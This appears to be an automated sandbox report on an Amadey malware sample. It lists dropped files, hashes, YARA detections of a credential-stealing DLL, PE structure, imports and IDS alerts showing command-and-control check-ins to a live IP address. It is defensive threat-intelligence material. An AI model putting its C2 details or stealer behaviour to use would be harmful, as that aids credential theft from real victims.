                                                                                                                                                                                                SSDEEP:6144:2nj+jLGbR5prANXqK4ULWttLmBr3C7JVMUjpPnFwCLLObfwB:A+He6NXpWRmBrgfxqC3O
                                                                                                                                                                                                MD5:DF920AEBFABB8C4CCCEB4DCEAD922ABD
                                                                                                                                                                                                SHA1:BE09CF240FBB15B7EAFC3D875C17B0EE30E94AA1
                                                                                                                                                                                                SHA-256:46DC1985999FC34875C1110E2E9A177A5A637B7668657525F6148AAC2CD23996
                                                                                                                                                                                                SHA-512:075AB9409F4DB41ADBA43652F3CF00DDA51799D9146AD7502B4B04524C68EBC2A0108307E979B49D86C45051F9D31684514F96490B5D782107C279BFF90C8CA6
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........P...1x.1x.1x.c..1x.c..!1x.c..1x....1x.1y..1x.c..1x.c..1x.c..1x.Rich.1x.................PE..L...y..a.................*....E.....JP.......@....@..........................0G.............................................$/..(.....D..F....................F......................................,..@............................................text....(.......*.................. ..`.data...hGC..@...H..................@....rsrc....F....D..H...v..............@..@.reloc..FC....F..D..................@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                Entropy (8bit):1.4755077381471955
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                                                                                                                                                                MD5:DEE86123FE48584BA0CE07793E703560
                                                                                                                                                                                                SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
                                                                                                                                                                                                SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                                                                                                                                                                SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe
                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):129024
                                                                                                                                                                                                Entropy (8bit):6.5122035629449355
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3072:Yx7pOYzBekK3tiINwyP7XSSJds3zhrjPcnqULv4G9:Yx7ZNhK3vwyOztPc3L
                                                                                                                                                                                                MD5:507E9DC7B9C42F535B6DF96D79179835
                                                                                                                                                                                                SHA1:ACF41FB549750023115F060071AA5CA8C33F249E
                                                                                                                                                                                                SHA-256:3B82A0EA49D855327B64073872EBB6B63EEE056E182BE6B1935AA512628252AF
                                                                                                                                                                                                SHA-512:70907EC4C395B0D2219BFE98907EC130BFCBC6D4BEC7BD73965A9B1E422553E27DAAEAD3D6647620FCF5392D85A2E975BCE0F7C79C0BC665DD33CE65F7D44302
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Author: Joe Security
                                                                                                                                                                                                • Rule: INDICATOR_TOOL_PWS_Amady, Description: Detects password stealer DLL. Dropped by Amadey, Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Author: ditekSHen
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                                                • Antivirus: Metadefender, Detection: 71%, Browse
                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................X......|.............@..........................@..........................................O.......&.... ..............................................................................................................CODE................................ ..`DATA................................@...BSS......................................idata..&...........................@....edata..O...........................@..P.reloc..............................@..P.rsrc........ ......................@..P.............@......................@..P................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):346112
                                                                                                                                                                                                Entropy (8bit):6.783777931421013
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3072:OJvvbtjLGg1cSgH7P7AGkZ2gdRJvh2vOfPztr+c+PEG7lOmV25lKE1miUO1a1e4Y:mtfGg0b8Gkfvh2v0BohVVPE+O1voXc
                                                                                                                                                                                                MD5:A687E1C326C9F03569BBFEF53E21C315
                                                                                                                                                                                                SHA1:1993746A547C67807C1118501E1A7FF9261F7C8B
                                                                                                                                                                                                SHA-256:8C2B385622DE52145317D9E740B62EDFB74260EFAB3478810D6C87CA41183F74
                                                                                                                                                                                                SHA-512:69C6D3A228AD0DF876CA3259A1CBD62893C48409AF271D9C4871FC8BDBB8E35ECF0C2D382086B65FC155A86D9CCD6101379A4D02D2F54545A5F746A6558D6A1C
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 27%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........P...1x.1x.1x.c..1x.c..!1x.c..1x....1x.1y..1x.c..1x.c..1x.c..1x.Rich.1x.................PE..L.....a.................*....D......P.......@....@...........................E.....2.......................................t/..(.....B.xE...................0E..................................... -..@............................................text...R(.......*.................. ..`.data.....A..@......................@....rsrc...xE....B..F..................@..@.reloc..8B...0E..D..................@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):26
                                                                                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):160970
                                                                                                                                                                                                Entropy (8bit):7.998900883724737
                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                SSDEEP:3072:iFVVQpnXXKcnOEKdQWGFs+Um9HLUqgoDAQnXerfTky0f3Pi2v:zHpnBKBG6+Um9HRTnXSTVm3Pi2v
                                                                                                                                                                                                MD5:C66EE78ED2EAEECD82D2A2BB7C48AE08
                                                                                                                                                                                                SHA1:04AB951005835DA0DBF2A8E5E611D538621C355B
                                                                                                                                                                                                SHA-256:16C7C2BBB880B27F2760880B05E1F62BB7267C26A12540111A56853812DC1375
                                                                                                                                                                                                SHA-512:836F2B0C46D7F13204F4534B4BF00F98DFD82C2C5F2AE41B5F44CE93376380BC2B97B92190CB9EA41E376DDEE01D183FAAFB92E595AD842A5B44780C3515B82F
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:i.<.m......qbjm.....!..\.,...E...;.`^...0..k.+%.j..Q.....Tw;..-P..!L.3...g.`Cw.q\./.. t3<T#. _a...2...Tf.V1.'......#.l[.u)'....v)....tP;.....^....g......Q....|.....c..Q....i_KO..S{._...._..D..4nlyI.wv......V1....b.....@..1.H.%......9.&.W.g....?..*6.W\..w... 1...Z.S..P.'...{.....;..F...G.5w.PZ.&A:e....Ax.....&zD...L#.....'7....$.0h.Lhc.....?...S.%....Eq)..\..bjq..'..-......Yg.. ..Lz........8P.%N.Mm-h$...l.x...d.X..GA.....;D..b.f-.n........9.8....%'...m.am^.c...Z...=g.....y4..i.,.....]i.s3'..O:......^lA....O.s.)..z.Ok....'.%...~..*. ....&.1..L;d..v..Yz..o.!..=,....E.zy#.V..M.t.+T...rzU{...I6..Y.1..8.X..]J8.=&<>g..M.1^:....X.............3.......j..w....A.?O..aI7E....a....%...~..3N...J....PY.....u.._...WLip,f.....d...\.B.o.39f@X!b..gc3.l.So.....R#...'.]-p.gT.m.Kz6k....R^V.!.\..a.Q..a!.:^q..P.U;Qh.....).a:....P+}.g.ng,.0......V.....5..1.Ffw;KM..j.p'k..W..vL....*.b.v.u.*0.a.p..H..A..j{...j.....bt..L*.d.......V.4..`.wg."e._...X.Y&CY.(..3..l%.b.8
                                                                                                                                                                                                Process:C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):15
                                                                                                                                                                                                Entropy (8bit):3.240223928941852
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:o3F:o1
                                                                                                                                                                                                MD5:509B054634B6DE74F111C3E646BC80FD
                                                                                                                                                                                                SHA1:99B4C0F39144A92FE42E22473A2A2552FB16BD13
                                                                                                                                                                                                SHA-256:07C7C151ADD6D955F3C876359C0E2A3A3FB0C519DD1E574413F0B68B345D8C36
                                                                                                                                                                                                SHA-512:A9C2D23947DBE09D5ECFBF6B3109F3CF8409E43176AE10C18083446EDE006E60E41C3EA2D2765036A967FC81B085D5F271686606AED4154AE45287D412CF6D40
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:processed dir:
                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Entropy (8bit):6.783777931421013
                                                                                                                                                                                                TrID:
                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                File name:q4Z52wRd28.exe
                                                                                                                                                                                                File size:346112
                                                                                                                                                                                                MD5:a687e1c326c9f03569bbfef53e21c315
                                                                                                                                                                                                SHA1:1993746a547c67807c1118501e1a7ff9261f7c8b
                                                                                                                                                                                                SHA256:8c2b385622de52145317d9e740b62edfb74260efab3478810d6c87ca41183f74
                                                                                                                                                                                                SHA512:69c6d3a228ad0df876ca3259a1cbd62893c48409af271d9c4871fc8bdbb8e35ecf0c2d382086b65fc155a86d9ccd6101379a4d02d2f54545a5f746a6558d6a1c
                                                                                                                                                                                                SSDEEP:3072:OJvvbtjLGg1cSgH7P7AGkZ2gdRJvh2vOfPztr+c+PEG7lOmV25lKE1miUO1a1e4Y:mtfGg0b8Gkfvh2v0BohVVPE+O1voXc
                                                                                                                                                                                                TLSH:4D74BF10FFD8C4E6C57DC4707A25CBE86638BCA27915DA1373787A5E6FB02818E62235
                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........P...1x..1x..1x..c...1x..c..!1x..c...1x......1x..1y..1x..c...1x..c...1x..c...1x.Rich.1x.................PE..L......a...........
                                                                                                                                                                                                Icon Hash:b4fcb6b6b69486e2
                                                                                                                                                                                                Entrypoint:0x40509a
                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                Time Stamp:0x619DE380 [Wed Nov 24 07:02:24 2021 UTC]
                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                OS Version Major:5
                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                File Version Major:5
                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                Import Hash:063e5449636b8762744e9ce9f5564a0d
                                                                                                                                                                                                Instruction
                                                                                                                                                                                                call 00007F69949EA88Eh
                                                                                                                                                                                                jmp 00007F69949E5DEDh
                                                                                                                                                                                                push 00000008h
                                                                                                                                                                                                push 00412B58h
                                                                                                                                                                                                call 00007F69949E6759h
                                                                                                                                                                                                mov ecx, dword ptr [ebp+08h]
                                                                                                                                                                                                test ecx, ecx
                                                                                                                                                                                                je 00007F69949E5F9Ch
                                                                                                                                                                                                cmp dword ptr [ecx], E06D7363h
                                                                                                                                                                                                jne 00007F69949E5F94h
                                                                                                                                                                                                mov eax, dword ptr [ecx+1Ch]
                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                je 00007F69949E5F8Dh
                                                                                                                                                                                                mov eax, dword ptr [eax+04h]
                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                je 00007F69949E5F86h
                                                                                                                                                                                                and dword ptr [ebp-04h], 00000000h
                                                                                                                                                                                                push eax
                                                                                                                                                                                                push dword ptr [ecx+18h]
                                                                                                                                                                                                call 00007F69949EAA17h
                                                                                                                                                                                                mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                                call 00007F69949E6768h
                                                                                                                                                                                                ret
                                                                                                                                                                                                xor eax, eax
                                                                                                                                                                                                cmp byte ptr [ebp+0Ch], al
                                                                                                                                                                                                setne al
                                                                                                                                                                                                ret
                                                                                                                                                                                                mov esp, dword ptr [ebp-18h]
                                                                                                                                                                                                call 00007F69949EA955h
                                                                                                                                                                                                int3
                                                                                                                                                                                                call 00007F69949E6F32h
                                                                                                                                                                                                xor ecx, ecx
                                                                                                                                                                                                cmp dword ptr [eax+00000090h], ecx
                                                                                                                                                                                                setne cl
                                                                                                                                                                                                mov al, cl
                                                                                                                                                                                                ret
                                                                                                                                                                                                mov edi, edi
                                                                                                                                                                                                push ebp
                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                mov eax, dword ptr [ebp+08h]
                                                                                                                                                                                                mov dword ptr [0042CF90h], eax
                                                                                                                                                                                                pop ebp
                                                                                                                                                                                                ret
                                                                                                                                                                                                mov edi, edi
                                                                                                                                                                                                push ebp
                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                sub esp, 00000328h
                                                                                                                                                                                                mov eax, dword ptr [00414454h]
                                                                                                                                                                                                xor eax, ebp
                                                                                                                                                                                                mov dword ptr [ebp-04h], eax
                                                                                                                                                                                                and dword ptr [ebp-00000328h], 00000000h
                                                                                                                                                                                                push ebx
                                                                                                                                                                                                push 0000004Ch
                                                                                                                                                                                                lea eax, dword ptr [ebp-00000324h]
                                                                                                                                                                                                push 00000000h
                                                                                                                                                                                                push eax
                                                                                                                                                                                                call 00007F69949EAD3Dh
                                                                                                                                                                                                lea eax, dword ptr [ebp-00000328h]
                                                                                                                                                                                                mov dword ptr [ebp-000002D8h], eax
                                                                                                                                                                                                lea eax, dword ptr [ebp-000002D0h]
                                                                                                                                                                                                add esp, 0Ch
                                                                                                                                                                                                mov dword ptr [ebp+00FFFD2Ch], eax
                                                                                                                                                                                                Programming Language:
                                                                                                                                                                                                • [ASM] VS2008 build 21022
                                                                                                                                                                                                • [ C ] VS2008 build 21022
                                                                                                                                                                                                • [C++] VS2008 build 21022
                                                                                                                                                                                                • [IMP] VS2005 build 50727
                                                                                                                                                                                                • [RES] VS2008 build 21022
                                                                                                                                                                                                • [LNK] VS2008 build 21022
                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x12f740x28.text
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x42e0000x24578.rsrc
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x4530000xba8.reloc
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x11d00x1c.text
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2d200x40.text
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x10000x184.text
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                .text0x10000x128520x12a00False0.582778418624161data6.708277757836571IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                .data0x140000x4190a80x19000unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                .rsrc0x42e0000x245780x24600False0.6301613509450171data6.346796819372492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                .reloc0x4530000x42380x4400False0.14981617647058823data1.7315741222067773IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                NameRVASizeTypeLanguageCountry
                                                                                                                                                                                                AFX_DIALOG_LAYOUT0x4501b80x2dataSetsuanaSouth Africa
                                                                                                                                                                                                AFX_DIALOG_LAYOUT0x4501a00x2dataSetsuanaSouth Africa
                                                                                                                                                                                                AFX_DIALOG_LAYOUT0x4501900xedataSetsuanaSouth Africa
                                                                                                                                                                                                AFX_DIALOG_LAYOUT0x4501800xedataSetsuanaSouth Africa
                                                                                                                                                                                                AFX_DIALOG_LAYOUT0x4501a80xedataSetsuanaSouth Africa
                                                                                                                                                                                                NAMUFILAZOXOGOJUNOCILI0x44e1600x1f9cASCII text, with very long lines (8092), with no line terminatorsSetsuanaSouth Africa
                                                                                                                                                                                                SIYOBOVEJAH0x44d3580x7d1ASCII text, with very long lines (2001), with no line terminatorsSetsuanaSouth Africa
                                                                                                                                                                                                ZONAGOPEGOVERUXAZAVIFAZE0x44db300x629ASCII text, with very long lines (1577), with no line terminatorsSetsuanaSouth Africa
                                                                                                                                                                                                RT_CURSOR0x4501c00x330Device independent bitmap graphic, 48 x 96 x 1, image size 0SetsuanaSouth Africa
                                                                                                                                                                                                RT_CURSOR0x4504f00x130Device independent bitmap graphic, 32 x 64 x 1, image size 0SetsuanaSouth Africa
                                                                                                                                                                                                RT_CURSOR0x4506480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SetsuanaSouth Africa
                                                                                                                                                                                                RT_CURSOR0x4514f00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SetsuanaSouth Africa
                                                                                                                                                                                                RT_CURSOR0x451dc00x130Device independent bitmap graphic, 32 x 64 x 1, image size 0SetsuanaSouth Africa
                                                                                                                                                                                                RT_CURSOR0x451ef00xb0Device independent bitmap graphic, 16 x 32 x 1, image size 0SetsuanaSouth Africa
                                                                                                                                                                                                RT_ICON0x42edd00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SetsuanaSouth Africa
                                                                                                                                                                                                RT_ICON0x42fc780x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SetsuanaSouth Africa
                                                                                                                                                                                                RT_ICON0x4305200x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SetsuanaSouth Africa
                                                                                                                                                                                                RT_ICON0x430a880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SetsuanaSouth Africa
                                                                                                                                                                                                RT_ICON0x4330300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SetsuanaSouth Africa
                                                                                                                                                                                                RT_ICON0x4340d80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0SetsuanaSouth Africa
                                                                                                                                                                                                RT_ICON0x434a600x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SetsuanaSouth Africa
                                                                                                                                                                                                RT_ICON0x434f300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SetsuanaSouth Africa
                                                                                                                                                                                                RT_ICON0x435dd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SetsuanaSouth Africa
                                                                                                                                                                                                RT_ICON0x4366800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SetsuanaSouth Africa
                                                                                                                                                                                                RT_ICON0x438c280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SetsuanaSouth Africa
                                                                                                                                                                                                RT_ICON0x439cd00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SetsuanaSouth Africa
                                                                                                                                                                                                RT_ICON0x43a1880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SetsuanaSouth Africa
                                                                                                                                                                                                RT_ICON0x43b0300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SetsuanaSouth Africa
                                                                                                                                                                                                RT_ICON0x43b8d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SetsuanaSouth Africa
                                                                                                                                                                                                RT_ICON0x43be400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SetsuanaSouth Africa
                                                                                                                                                                                                RT_ICON0x43e3e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SetsuanaSouth Africa
                                                                                                                                                                                                RT_ICON0x43f4900x988Device independent bitmap graphic, 24 x 48 x 32, image size 0SetsuanaSouth Africa
                                                                                                                                                                                                RT_ICON0x43fe180x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SetsuanaSouth Africa
                                                                                                                                                                                                RT_ICON0x4402e80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsSetsuanaSouth Africa
                                                                                                                                                                                                RT_ICON0x4411900x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsSetsuanaSouth Africa
                                                                                                                                                                                                RT_ICON0x441a380x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsSetsuanaSouth Africa
                                                                                                                                                                                                RT_ICON0x4421000x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsSetsuanaSouth Africa
                                                                                                                                                                                                RT_ICON0x4426680x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216SetsuanaSouth Africa
                                                                                                                                                                                                RT_ICON0x444c100x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096SetsuanaSouth Africa
                                                                                                                                                                                                RT_ICON0x445cb80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304SetsuanaSouth Africa
                                                                                                                                                                                                RT_ICON0x4466400x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024SetsuanaSouth Africa
                                                                                                                                                                                                RT_ICON0x446b200xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SetsuanaSouth Africa
                                                                                                                                                                                                RT_ICON0x4479c80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SetsuanaSouth Africa
                                                                                                                                                                                                RT_ICON0x4482700x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0SetsuanaSouth Africa
                                                                                                                                                                                                RT_ICON0x4489380x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SetsuanaSouth Africa
                                                                                                                                                                                                RT_ICON0x448ea00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SetsuanaSouth Africa
                                                                                                                                                                                                RT_ICON0x44b4480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SetsuanaSouth Africa
                                                                                                                                                                                                RT_ICON0x44c4f00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0SetsuanaSouth Africa
                                                                                                                                                                                                RT_ICON0x44ce780x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SetsuanaSouth Africa
                                                                                                                                                                                                RT_STRING0x4521b80x3bcdataSetsuanaSouth Africa
                                                                                                                                                                                                RT_ACCELERATOR0x4501000x40dataSetsuanaSouth Africa
                                                                                                                                                                                                RT_GROUP_CURSOR0x4506200x22dataSetsuanaSouth Africa
                                                                                                                                                                                                RT_GROUP_CURSOR0x451d980x22dataSetsuanaSouth Africa
                                                                                                                                                                                                RT_GROUP_CURSOR0x451fa00x22dataSetsuanaSouth Africa
                                                                                                                                                                                                RT_GROUP_ICON0x434ec80x68dataSetsuanaSouth Africa
                                                                                                                                                                                                RT_GROUP_ICON0x43a1380x4cdataSetsuanaSouth Africa
                                                                                                                                                                                                RT_GROUP_ICON0x4402800x68dataSetsuanaSouth Africa
                                                                                                                                                                                                RT_GROUP_ICON0x446aa80x76dataSetsuanaSouth Africa
                                                                                                                                                                                                RT_GROUP_ICON0x44d2e00x76dataSetsuanaSouth Africa
                                                                                                                                                                                                RT_VERSION0x451fc80x1f0MS Windows COFF PowerPC object fileSetsuanaSouth Africa
                                                                                                                                                                                                None0x4501500xadataSetsuanaSouth Africa
                                                                                                                                                                                                None0x4501400xadataSetsuanaSouth Africa
                                                                                                                                                                                                None0x4501600xadataSetsuanaSouth Africa
                                                                                                                                                                                                None0x4501700xadataSetsuanaSouth Africa
                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                KERNEL32.dllGetComputerNameA, SetProcessAffinityMask, WriteConsoleOutputCharacterA, OpenJobObjectA, GetCommState, AddConsoleAliasW, CreateHardLinkA, GetSystemDefaultLCID, GetModuleHandleW, GetTickCount, GetConsoleAliasesA, WaitNamedPipeW, LoadLibraryW, CopyFileW, GetFileAttributesA, EnumSystemCodePagesA, GetFileAttributesW, WriteConsoleW, GetVolumePathNameA, FillConsoleOutputCharacterW, GetLastError, GetProcAddress, VirtualAlloc, RemoveDirectoryA, LoadLibraryA, WriteConsoleA, GetProcessWorkingSetSize, LocalAlloc, GetModuleHandleA, CreateMutexA, FindNextFileW, GetStringTypeW, GetFileAttributesExW, SetFileShortNameA, GetVolumeNameForVolumeMountPointW, LCMapStringW, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, GetFileType, DeleteCriticalSection, HeapAlloc, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, Sleep, HeapSize, ExitProcess, RtlUnwind, SetFilePointer, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, WriteFile, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapCreate, VirtualFree, HeapFree, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetConsoleCP, GetConsoleMode, InitializeCriticalSectionAndSpinCount, HeapReAlloc, CloseHandle, CreateFileA, SetStdHandle, LCMapStringA, MultiByteToWideChar, GetStringTypeA, GetLocaleInfoA, FlushFileBuffers, GetConsoleOutputCP, SetEndOfFile, GetProcessHeap, ReadFile
                                                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                SetsuanaSouth Africa
                                                                                                                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                192.168.2.3193.56.146.17449747802027700 11/19/22-16:58:50.225468TCP2027700ET TROJAN Amadey CnC Check-In4974780192.168.2.3193.56.146.174
                                                                                                                                                                                                192.168.2.3193.56.146.17449753802027700 11/19/22-16:58:52.314328TCP2027700ET TROJAN Amadey CnC Check-In4975380192.168.2.3193.56.146.174
                                                                                                                                                                                                192.168.2.3193.56.146.17449744802027700 11/19/22-16:58:49.534930TCP2027700ET TROJAN Amadey CnC Check-In4974480192.168.2.3193.56.146.174
